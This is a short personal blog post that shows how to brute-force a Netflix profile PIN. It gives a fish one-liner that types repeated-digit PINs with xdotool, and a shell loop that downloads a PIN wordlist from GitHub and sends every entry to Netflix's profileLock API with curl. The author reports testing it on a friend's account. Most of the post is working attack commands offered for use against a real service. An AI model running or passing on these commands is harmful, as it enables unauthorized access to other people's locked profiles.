lcat
My personal /var/log
  • Home
  • Contact
  • HackMe!

How to bruteforce Netflix profile PIN

This is just a proof of concept.

```fish
sleep 3; for i in (seq 0 99); set pin (printf '%02d%02d' $i $i); for pd in (echo $pin | fold -w1); xdotool type $pd; sleep 0.05; end; sleep .5; echo $pin; end
```

Netflix is smart enough (I guess) to somehow throttle the input handling to try to mess things up if bruteforce is detected. The above code only performs bruteforce for repeating 2 digits (e.g. 1919, 1717). I think the pattern is common for Netflix profiles (*why would anyone pick a hard pin combo just to watch a movie?*).

Tested on my friend's Netflix lol (hi zes)

UPDATE: I just read [this](https://vaaibhavsharma.medium.com/bypassing-netflix-profile-lock-66bef9174cc6). I tried it, and it worked. It works even better(?). My command is something like:

```sh
while read -r pin; do printf "$pin -- "; curl 'https://www.netflix.com/api/shakti/mre/profileLock' [LONG PASTED CURL COMMAND FROM CHROME DEVTOOLS] --data-raw '{"pin":"'$pin'","action":"verify","guid":"hehe","authURL":"hehe.hehe="}' -w '%{http_code}\n'; done < <(curl -s 'https://raw.githubusercontent.com/vaaibhavsharma/netflixprofilelock/refs/heads/main/fullWL.txt')
```

I tried similar technique few months ago but it didn't work -- must've missed something.
Created: 2024-10-18 13:21:42, Updated: 2024-11-11 18:51:23, ID: 1b11d9c2-49ca-4b7e-a5e9-78f3fa47df2d